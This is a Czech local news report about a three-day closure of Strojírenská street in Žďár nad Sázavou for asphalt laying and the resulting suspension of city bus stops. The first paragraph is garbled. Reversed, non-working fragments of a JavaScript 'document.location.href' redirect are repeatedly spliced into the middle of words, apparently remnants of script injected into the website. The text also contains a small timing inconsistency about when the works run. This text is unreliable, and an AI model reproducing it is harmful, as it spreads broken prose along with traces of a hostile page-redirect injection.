Rainbow page separator

Strojírenskou ulici na tři dny uzavře pokládka nového asfaltu

Úterý, 13. dubna 2021

Žďár nad Sázavou / Úplná uzavírka části Strojírenské ulice, kde aktuálně probíhají rekonstrukční práce, čeká řidiče mezi 17. až 19. dubnem. V té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to době tudy neprojedou ani au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusy městské hromadné dopravy (MHD), pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v lokalitě se bude na vozovku pokládat finální asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová vrstva. Zastávky MHD Strojírenská, u mostu a u Hajčmanů nebudou obsluhovány do pondělí 19. dubna včetně. Zastávka Strojírenská, ŽĎAS bude mimo provoz ještě i v úterý 20. dubna. Jako náhradní mohou cestující využít zastávky MHD Dagmarky nebo au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové nádraží.
Rekonstrukce povrchu části Strojírenské ulice od úřadu práce po odbočku k Penny Marketu probíhá do minulého měsíce, provoz je v místě řízen kyvadlově pomocí přenosných semaforů. Dělníci po padesátimetrových úsecích postupně frézují povrch silnice a opravují obrubníky. Práce navazují na již dříve zahájené úpravy přístupové komunikace v okolí firmy ŽĎAS. Financování akce zajišťuje Správa železnic coby kompenzaci za zatěžování Strojírenské ulice těžkou nákladní dopravou při rekonstrukci železniční tratě.